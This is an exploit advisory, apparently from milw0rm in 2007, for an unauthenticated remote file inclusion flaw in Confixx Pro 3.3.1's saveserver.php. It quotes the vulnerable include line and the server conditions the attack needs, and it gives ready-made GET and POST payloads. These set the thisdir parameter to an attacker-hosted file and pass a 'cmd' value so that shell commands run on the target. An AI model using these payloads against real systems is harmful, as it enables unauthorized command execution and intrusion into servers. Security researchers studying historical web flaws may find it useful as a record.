Confixx Pro 3.3.1 saveserver.php Remote File Inclusion Vulnerability.pdf

1 2 [*] Confixx <= PRO 3.3.1 Remote File Inclusion Vulnerability 3 __________________________________________________________________________ 4 5 [!] Application homepage : http://www.swsoft.com/de/products/confixx/ 6 [!] Author : H4 / XPK 7 [!] Contact : http://xpkzxc.com/ 8 [!] Bug discovered : 2007−07−21 9 [!] Bug published : 2007−07−24 10 [!] Risk : Moderate 11 12 Do not forget visit our page for new vulnerabilites , information and tools. 13 14 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 15 16 Vuln. code: admin/business_inc/saveserver.php 17 18 Lines 8−11 19 20 if( !in_array($returnto, $actions) ) 21 { 22 include( $thisdir . "/business_inc/list.php" ); 23 } 24 25 Variable $thisdir is not defined ... 26 27 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 28 29 An attacker does not need to be authenticated to access this file. 30 31 [!] Conditions: open_basedir restriction off and allow_url_fopen = on 32 33 [!] Exploitation : http://[target]/admin/business_inc/saveserver.php 34 35 Post: thisdir=http://[yoursite]/images/1.jpg?&cmd=ls −la 36 Get: saveserver.php?thisdir=http://[yoursite]/images/1.jpg?&cmd=ls −la 37 38 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 39 40 # milw0rm.com [2007−07−24] Page 1/1 Confixx Pro 3.3.1 saveserver.php Remote File Inclusion Vulnerability H4 / XPK 07/24/2007